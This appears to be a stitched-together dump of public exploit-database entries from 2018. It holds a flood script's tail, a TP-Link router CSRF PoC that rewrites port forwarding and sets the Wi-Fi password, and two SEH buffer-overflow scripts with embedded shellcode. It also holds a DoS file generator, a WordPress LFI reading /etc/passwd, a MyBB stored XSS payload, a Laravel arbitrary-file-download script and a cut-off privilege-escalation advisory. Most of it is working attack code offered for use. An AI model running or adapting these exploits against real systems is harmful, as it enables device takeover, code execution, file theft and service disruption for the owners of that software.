odernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code&style=100&dir=LTR&d=1520450366'
for i in range(args.t):
t = SendGETThread()
t.start()
if args.p:
url = args.p
for i in range(args.t):
t = SendPOSTThread()
t.start()
if len(sys.argv)==1:
parser.print_help()
exit()
if __name__ == "__main__":
main(sys.argv[1:])
/*
Exploit Title: TL-WR720N 150Mbps Wireless N Router - CSRF
Date: 21-3-2018
Exploit Author: Mans van Someren
Vendor Homepage: https://www.tp-link.com/
Software Link: https://static.tp-link.com/resources/software/TL-WR720N_V1_130719.zip
Version: All versions because its a 0day
Testen on: Google Chrome - Windows 10
this is only a portforwarding & change wifi password PoC but every action I found on the router is vulnerable to CSRF
*/
var ROUTER_HOSTS = ['192.168.0.1', '192.168.1.1'];
var ROUTER_PORTS = ['80', '8080'];
function portforward(router_host, router_port, host, port) {
var img = new Image();
img.src = 'http://' + router_host + ':' + router_port + '/userRpm/VirtualServerRpm.htm?Port=' + port + '&Ip=' + host + '&Protocol=1&State=1&Commonport=0&Changed=0&SelIndex=0&Page=1&Save=Save';
}
function change_wifi_pass(router_host, router_port, newpass) {
var img = new Image();
img.src = 'http://' + router_host + ':' + router_port + '/userRpm/WlanSecurityRpm.htm?vapIdx=1&wepSecOpt=3&keytype=1&keynum=1&key1=&length1=0&key2=&length2=0&key3=&length3=0&key4=&length4=0&wpaSecOpt=3&wpaCipher=1&radiusIp=&radiusPort=1812&radiusSecret=&intervalWpa=86400&secType=3&pskSecOpt=2&pskCipher=3&pskSecret=' + newpass + '&interval=86400&Save=Save';
}
for (var i = 0; i < ROUTER_HOSTS.length; i++) {
for (var j = 0; j < ROUTER_PORTS.length; j++) {
portforward(ROUTER_HOSTS[i], ROUTER_PORTS[j], '192.168.0.1', '23');
change_wifi_pass(ROUTER_HOSTS[i], ROUTER_PORTS[j], 'pwned123');
}
}
#!/usr/bin/python
###############################################################################
# Exploit Title : Easy CD DVD Copy v1.3.24 - Local Buffer Overflow (SEH) #
# Exploit Author : Hashim Jawad #
# Twitter : @ihack4falafel #
# Author Website : ihack4falafel[.]com #
# Vendor Homepage : http://www.divxtodvd.net/index.htm #
# Vulnerable Software: http://www.divxtodvd.net/easy_cd_dvd_copy.exe #
# Tested on OS : Windows XP professional SP3 - (996 bytes offset) #
# Windows 7 Enterprise SP1 - (1008 bytes offset) #
# Windows 10 Professional 64bit - (988 bytes offset) #
# Steps to reproduce : #
# ~ Copy the content of OpenMe.txt #
# ~ Click on Register #
# ~ Paste content in "Enter User Name" field #
###############################################################################
import struct
#root@kali:~# msfvenom -p windows/exec CMD=calc.exe -b "\x00" -f python -v shellcode (220 bytes)
shellcode = ""
shellcode += "\xbf\xc6\xde\x94\x3e\xda\xd0\xd9\x74\x24\xf4\x5d"
shellcode += "\x31\xc9\xb1\x31\x31\x7d\x13\x03\x7d\x13\x83\xc5"
shellcode += "\xc2\x3c\x61\xc2\x22\x42\x8a\x3b\xb2\x23\x02\xde"
shellcode += "\x83\x63\x70\xaa\xb3\x53\xf2\xfe\x3f\x1f\x56\xeb"
shellcode += "\xb4\x6d\x7f\x1c\x7d\xdb\x59\x13\x7e\x70\x99\x32"
shellcode += "\xfc\x8b\xce\x94\x3d\x44\x03\xd4\x7a\xb9\xee\x84"
shellcode += "\xd3\xb5\x5d\x39\x50\x83\x5d\xb2\x2a\x05\xe6\x27"
shellcode += "\xfa\x24\xc7\xf9\x71\x7f\xc7\xf8\x56\x0b\x4e\xe3"
shellcode += "\xbb\x36\x18\x98\x0f\xcc\x9b\x48\x5e\x2d\x37\xb5"
shellcode += "\x6f\xdc\x49\xf1\x57\x3f\x3c\x0b\xa4\xc2\x47\xc8"
shellcode += "\xd7\x18\xcd\xcb\x7f\xea\x75\x30\x7e\x3f\xe3\xb3"
shellcode += "\x8c\xf4\x67\x9b\x90\x0b\xab\x97\xac\x80\x4a\x78"
shellcode += "\x25\xd2\x68\x5c\x6e\x80\x11\xc5\xca\x67\x2d\x15"
shellcode += "\xb5\xd8\x8b\x5d\x5b\x0c\xa6\x3f\x31\xd3\x34\x3a"
shellcode += "\x77\xd3\x46\x45\x27\xbc\x77\xce\xa8\xbb\x87\x05"
shellcode += "\x8d\x34\xc2\x04\xa7\xdc\x8b\xdc\xfa\x80\x2b\x0b"
shellcode += "\x38\xbd\xaf\xbe\xc0\x3a\xaf\xca\xc5\x07\x77\x26"
shellcode += "\xb7\x18\x12\x48\x64\x18\x37\x2b\xeb\x8a\xdb\x82"
shellcode += "\x8e\x2a\x79\xdb"
buffer = "A" * 988 # Junk
buffer += "\xeb\x14\x90\x90" # + nSEH (Jump Code)
buffer += struct.pack('<L', 0x10037b11) # + SEH (pop ebx # pop eax # ret | [SkinMagic.dll])
buffer += "\x90" * 50 # + NOP
buffer += shellcode # + shellcode
buffer += "\x90" * 50 # + NOP
try:
f=open("OpenMe.txt","w")
print "[+] Creating %s bytes evil payload.." %len(buffer)
f.write(buffer)
f.close()
print "[+] File created!"
except:
print "File cannot be created"
#!/usr/bin/python
###########################################################################################
# Exploit Title : Easy Avi Divx Xvid to DVD Burner v2.9.11 - Local Denial of Service #
# Exploit Author : Hashim Jawad #
# Twitter : @ihack4falafel #
# Author Website : ihack4falafel[.]com #
# Vendor Homepage : http://www.divxtodvd.net/index.htm #
# Vulnerable Software: http://www.divxtodvd.net/easy_divx_to_dvd.exe #
# Tested on OS : Windows XP professional SP3 #
# Windows 10 professional 64-bit #
# Steps to reproduce : Add Evil.AVI and BOOM! #
###########################################################################################
buffer = "A" * 500
try:
f=open("Evil.AVI","w")
print "[+] Creating %s bytes evil payload.." %len(buffer)
f.write(buffer)
f.close()
print "[+] File created!"
except:
print "File cannot be created"
Product: Site Editor Wordpress Plugin - https://wordpress.org/plugins/site-editor/
Vendor: Site Editor
Tested version: 1.1.1
CVE ID: CVE-2018-7422
** CVE description **
A Local File Inclusion vulnerability in the Site Editor plugin through 1.1.1 for WordPress allows remote attackers to retrieve arbitrary files via the ajax_path parameter to editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php.
** Technical details **
In site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php:5, the value of the ajax_path parameter is used for including a file with PHP’s require_once(). This parameter can be controlled by an attacker and is not properly sanitized.
Vulnerable code:
if( isset( $_REQUEST['ajax_path'] ) && is_file( $_REQUEST['ajax_path'] ) && file_exists( $_REQUEST['ajax_path'] ) ){
require_once $_REQUEST['ajax_path'];
}
https://plugins.trac.wordpress.org/browser/site-editor/trunk/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?rev=1640500#L5
By providing a specially crafted path to the vulnerable parameter, a remote attacker can retrieve the contents of sensitive files on the local system.
** Proof of Concept **
http://<host>/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd
** Solution **
No fix available yet.
** Timeline **
03/01/2018: author contacted through siteeditor.org's contact form; no reply
16/01/2018: issue report filled on the public GitHub page with no technical details
18/01/2018: author replies and said he replied to our e-mail 8 days ago (could not find the aforementioned e-mail at all); author sends us "another" e-mail
19/01/2018: report sent; author says he will fix this issue "very soon"
31/01/2018: vendor contacted to ask about an approximate release date and if he needs us to postpone the disclosure; no reply
14/02/2018: WP Plugins team contacted; no reply
06/03/2018: vendor contacted; no reply
07/03/2018: vendor contacted; no reply
15/03/2018: public disclosure
** Credits **
Vulnerability discovered by Nicolas Buzy-Debat working at Orange Cyberdefense Singapore (CERT-LEXSI).
--
Best Regards,
Nicolas Buzy-Debat
Orange Cyberdefense Singapore (CERT-LEXSI)
# Exploit Title: MyBB Last User's Threads in Profile Plugin v1.2 - Persistent XSS
# Date: 3/19/2018
# Author: 0xB9
# Contact: luxorforums.com/User-0xB9 or 0xB9[at]protonmail.com
# Software Link: https://community.mybb.com/mods.php?action=view&pid=910
# Version: v1.2
# Tested on: Ubuntu 17.10
1. Description:
Display last threads in user profile.
2. Proof of Concept:
Persistent XSS
- Create a thread with the following subject <p """><SCRIPT>alert("XSS")</SCRIPT>">
- Now visit your profile to see the alert.
3. Solution:
Patch: https://github.com/vintagedaddyo/MyBB_Plugin_Last-User-s-Threads-in-Profile/commit/5e3b81450d0bf7935885db2622f1a42e5961258d
# SWAMI KARUPASAMI THUNAI
#
###############################################################################
# Exploit Title: Stack Based Buffer Overflow in Allok Fast AVI MPEG Splitter 1.2 (Windows XP SP3)
# Date: 06-03-2018
# Exploit Author: Mohan Ravichandran & Velayutham Selvaraj
# Organization : TwinTech Solutions
# Vulnerable Software: Allok Fast AVI MPEG Splitter 1.2
# Vendor Homepage: http://www.alloksoft.com
# Version: 1.2
# Software Link: http://www.alloksoft.com/allok_vconverter.exe
# Tested On: Windows XP Service Pack 3 (Version 2002) & windows 7 x64 Ultimate
#
# Credit to Velayutham Selvaraj for discovering the Vulnerbility
# Vulnerability Disclosure Date : 2018-03-06
#
# Manual steps to reproduce the vulnerability ...
#1. Download and install the "setup(allok_fast_avimpegsplitter.exe)" file
#2. Run this exploit code via python 2.7
#3. A file "exploit.txt" will be created
#4. Copy the contents of the file and paste in the License Name field
# Name > exploit.txt
#5. Type some random character in License Code
#6. Click Register and voila !
#7. Boom calculator opens
#
##############################################################################
import struct
file = open("exploit.txt","wb")
buflen = 4000
junk = "A" * 780
nseh = "\x90\x90\xeb\x10"
seh = struct.pack("<L",0x10019A09)
nops = "\x90" * 20
# The below shellcode will open calculator, but can be modified by need.
shellcode = ""
shellcode +="\xba\xd5\x31\x08\x38\xdb\xcb\xd9\x74\x24\xf4\x5b\x29\xc9\xb1"
shellcode +="\x33\x83\xc3\x04\x31\x53\x0e\x03\x86\x3f\xea\xcd\xd4\xa8\x63"
shellcode +="\x2d\x24\x29\x14\xa7\xc1\x18\x06\xd3\x82\x09\x96\x97\xc6\xa1"
shellcode +="\x5d\xf5\xf2\x32\x13\xd2\xf5\xf3\x9e\x04\x38\x03\x2f\x89\x96"
shellcode +="\xc7\x31\x75\xe4\x1b\x92\x44\x27\x6e\xd3\x81\x55\x81\x81\x5a"
shellcode +="\x12\x30\x36\xee\x66\x89\x37\x20\xed\xb1\x4f\x45\x31\x45\xfa"
shellcode +="\x44\x61\xf6\x71\x0e\x99\x7c\xdd\xaf\x98\x51\x3d\x93\xd3\xde"
shellcode +="\xf6\x67\xe2\x36\xc7\x88\xd5\x76\x84\xb6\xda\x7a\xd4\xff\xdc"
shellcode +="\x64\xa3\x0b\x1f\x18\xb4\xcf\x62\xc6\x31\xd2\xc4\x8d\xe2\x36"
shellcode +="\xf5\x42\x74\xbc\xf9\x2f\xf2\x9a\x1d\xb1\xd7\x90\x19\x3a\xd6"
shellcode +="\x76\xa8\x78\xfd\x52\xf1\xdb\x9c\xc3\x5f\x8d\xa1\x14\x07\x72"
shellcode +="\x04\x5e\xa5\x67\x3e\x3d\xa3\x76\xb2\x3b\x8a\x79\xcc\x43\xbc"
shellcode +="\x11\xfd\xc8\x53\x65\x02\x1b\x10\x99\x48\x06\x30\x32\x15\xd2"
shellcode +="\x01\x5f\xa6\x08\x45\x66\x25\xb9\x35\x9d\x35\xc8\x30\xd9\xf1"
shellcode +="\x20\x48\x72\x94\x46\xff\x73\xbd\x24\x9e\xe7\x5d\x85\x05\x80"
shellcode +="\xc4\xd9"
exploit = junk + nseh + seh + nops + shellcode
fillers = buflen - len(exploit)
buf = exploit + "D" * fillers
file.write(buf)
file.close()
# Exploit Title: Laravel log viewer by rap2hpoutre local file download (LFD)
# Date: 23/02/2018
# Exploit Author: Haboob Team
# Software Link: https://github.com/rap2hpoutre/laravel-log-viewer/tree/v0.11.1
# Version: v0.12.0 and below
# CVE : CVE-2018-8947
1. Description
Unauthorized user can access Laravel log viewer by rap2hpoutre and use download function to download any file with laravel permission, by base64 encode the wanted file.
2. Proof of Concept
#After providing the url of the vulnerable laravel log viewer by rap2hpoutre (with / in the end or you can edit it yourself), and the file wanted including "../" the script will create a folder and save the downloaded file there
import os
import base64
from urllib2 import urlopen, URLError, HTTPError
import argparse
import cookielib
parser = argparse.ArgumentParser(description='_0_ Laravel 0Day _0_')
parser.add_argument("-u", action="store", dest="url", help="Target URL", required=True)
parser.add_argument("-f", action="store", dest="file", help="Target File", required=True)
args = parser.parse_args()
url = str(args.url).strip()+"/logs/?dl="
final_file= args.file
if not os.path.exists("./0Grats0"):
os.makedirs("./0Grats0")
word = str(args.file).split('/')
word1= "./0Grats0/"+word[-1]
finalee=url+base64.b64encode(final_file)
try:
f = urlopen(finalee)
with open(word1, "wb") as local_file:
local_file.write(f.read())
except HTTPError, e:
print "HTTP Error:", e.code, finalee
except URLError, e:
print "URL Error:", e.reason, finalee
3. Solution:
Update to version v0.13.0
https://github.com/rap2hpoutre/laravel-log-viewer/releases/tag/v0.13.0
Exploit Author: bzyo
Twitter: @bzyo_
Exploit Title: LabF nfsAxe 3.7 - Privilege Escalation
Date: 03-24-2018
Vulnerable Software: LabF nfsAxe 3.7
Vendor Homepage: http://www.labf.com/
Version: 3.7
Software Link: http://www.labf.com/download/nfsaxe.exe
Tested On: Windows 7 x86 and x64 *Requires Windows 7 Public Sharing to be enabled
Details:
By default LabF nfsAxe 3.7 installs to "C:\Users\Public\Program Files\LabF.com\nfsAxe" and installs
a service called "XwpXSetSrvnfsAxe service". To start this service an executable "xsetsrv.exe"
